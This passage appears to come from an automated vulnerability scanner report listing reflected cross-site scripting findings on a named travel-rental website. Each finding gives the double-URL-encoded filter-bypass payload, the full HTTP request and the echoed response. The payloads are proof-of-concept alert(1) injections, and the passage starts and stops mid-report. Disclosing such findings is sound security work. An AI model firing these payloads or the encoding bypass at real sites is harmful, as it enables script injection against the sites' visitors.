This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the &token request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /apartment_results.php?lang=en&&token=3342e7c89333e3aeb8a546914650b07098659%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b5d6d43c62f HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3; __utma=196875455.901863034.1317388358.1317388358.1317388358.1; __utmb=196875455.1.10.1317388358; __utmc=196875455; __utmz=196875455.1317388358.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:19:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 38869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/apartment_results.php?lang=en&amp;&amp;token=3342e7c89333e3aeb8a546914650b07098659"style="x:expression(alert(1))"b5d6d43c62f" target="_blank">
...[SNIP]...

2.130. http://www.barcelonapoint.com/apartment_results.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /apartment_results.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 104e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252257fd912faf2 was submitted in the REST URL parameter 1. This input was echoed as 104e3"style="x:expression(alert(1))"57fd912faf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /apartment_results.php104e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252257fd912faf2 HTTP/1.1
Host: www.barcelonapoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:19:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/apartment_results.php104e3"style="x:expression(alert(1))"57fd912faf2" target="_blank">
...[SNIP]...

2.131. http://www.barcelonapoint.com/apartment_results.php [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /apartment_results.php

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e3f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25225932131440d was submitted in the lang parameter. This input was echoed as 2e3f6"style="x:expression(alert(1))"5932131440d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the lang request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /apartment_results.php?lang=en2e3f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25225932131440d&&token=3342e7c89333e3aeb8a546914650b070 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3; __utma=196875455.901863034.1317388358.1317388358.1317388358.1; __utmb=196875455.1.10.1317388358; __utmc=196875455; __utmz=196875455.1317388358.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 38476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/apartment_results.php?lang=en2e3f6"style="x:expression(alert(1))"5932131440d&amp;&amp;token=3342e7c89333e3aeb8a546914650b070" target="_blank">
...[SNIP]...

2.132. http://www.barcelonapoint.com/apartment_results.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /apartment_results.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 758da"><script>alert(1)</script>962c76745bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apartment_results.php/758da"><script>alert(1)</script>962c76745bd HTTP/1.1
Host: www.barcelonapoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:19:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 30401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/apartment_results.php/758da"><script>alert(1)</script>962c76745bd?lang=en&token=3342e7c89333e3aeb8a546914650b070" target="_blank">
...[SNIP]...

2.133. http://www.barcelonapoint.com/apartment_results.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /apartment_results.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 480ea%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c35b234598c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 480ea"style="x:expression(alert(1))"c35b234598c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /apartment_results.php?480ea%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c35b234598c=1 HTTP/1.1
Host: www.barcelonapoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:19:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 38551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/apartment_results.php?480ea"style="x:expression(alert(1))"c35b234598c=1" target="_blank">
...[SNIP]...

2.134. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71db7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25227d721fec5bf was submitted in the REST URL parameter 1. This input was echoed as 71db7"style="x:expression(alert(1))"7d721fec5bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en71db7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25227d721fec5bf/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&h=45&w=45 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:13:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16824
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/en71db7"style="x:expression(alert(1))"7d721fec5bf/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&amp;h=45&amp;w=45" target="_blank">
...[SNIP]...

2.135. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b96%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223d21c8f4e18 was submitted in the REST URL parameter 2. This input was echoed as a6b96"style="x:expression(alert(1))"3d21c8f4e18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en/bloga6b96%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223d21c8f4e18/wp-content/themes/barcelonapoint-en/scripts/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&h=45&w=45 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:13:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16824
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/en/bloga6b96"style="x:expression(alert(1))"3d21c8f4e18/wp-content/themes/barcelonapoint-en/scripts/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&amp;h=45&amp;w=45" target="_blank">
...[SNIP]...

2.136. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f4d5%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25226459dc47ca4 was submitted in the REST URL parameter 3. This input was echoed as 7f4d5"style="x:expression(alert(1))"6459dc47ca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en/blog/wp-content7f4d5%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25226459dc47ca4/themes/barcelonapoint-en/scripts/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&h=45&w=45 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16824
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/en/blog/wp-content7f4d5"style="x:expression(alert(1))"6459dc47ca4/themes/barcelonapoint-en/scripts/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&amp;h=45&amp;w=45" target="_blank">
...[SNIP]...

2.137. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbca4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b730824fa72 was submitted in the REST URL parameter 4. This input was echoed as dbca4"style="x:expression(alert(1))"b730824fa72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en/blog/wp-content/themesdbca4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b730824fa72/barcelonapoint-en/scripts/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&h=45&w=45 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:14:06 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16824
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/en/blog/wp-content/themesdbca4"style="x:expression(alert(1))"b730824fa72/barcelonapoint-en/scripts/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&amp;h=45&amp;w=45" target="_blank">
...[SNIP]...

2.138. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cafd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac75282f82e was submitted in the REST URL parameter 5. This input was echoed as 2cafd"style="x:expression(alert(1))"ac75282f82e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en/blog/wp-content/themes/barcelonapoint-en2cafd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac75282f82e/scripts/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&h=45&w=45 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16824
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/en/blog/wp-content/themes/barcelonapoint-en2cafd"style="x:expression(alert(1))"ac75282f82e/scripts/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&amp;h=45&amp;w=45" target="_blank">
...[SNIP]...

2.139. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dffe%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a5f0fced52 was submitted in the REST URL parameter 6. This input was echoed as 4dffe"style="x:expression(alert(1))"a5f0fced52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en/blog/wp-content/themes/barcelonapoint-en/scripts4dffe%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a5f0fced52/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&h=45&w=45 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:14:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16818
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts4dffe"style="x:expression(alert(1))"a5f0fced52/timthumb.php?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&amp;h=45&amp;w=45" target="_blank">
...[SNIP]...

2.140. http://www.barcelonapoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67034%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ecb05724ee4 was submitted in the REST URL parameter 7. This input was echoed as 67034"style="x:expression(alert(1))"ecb05724ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php67034%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ecb05724ee4?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&h=45&w=45 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
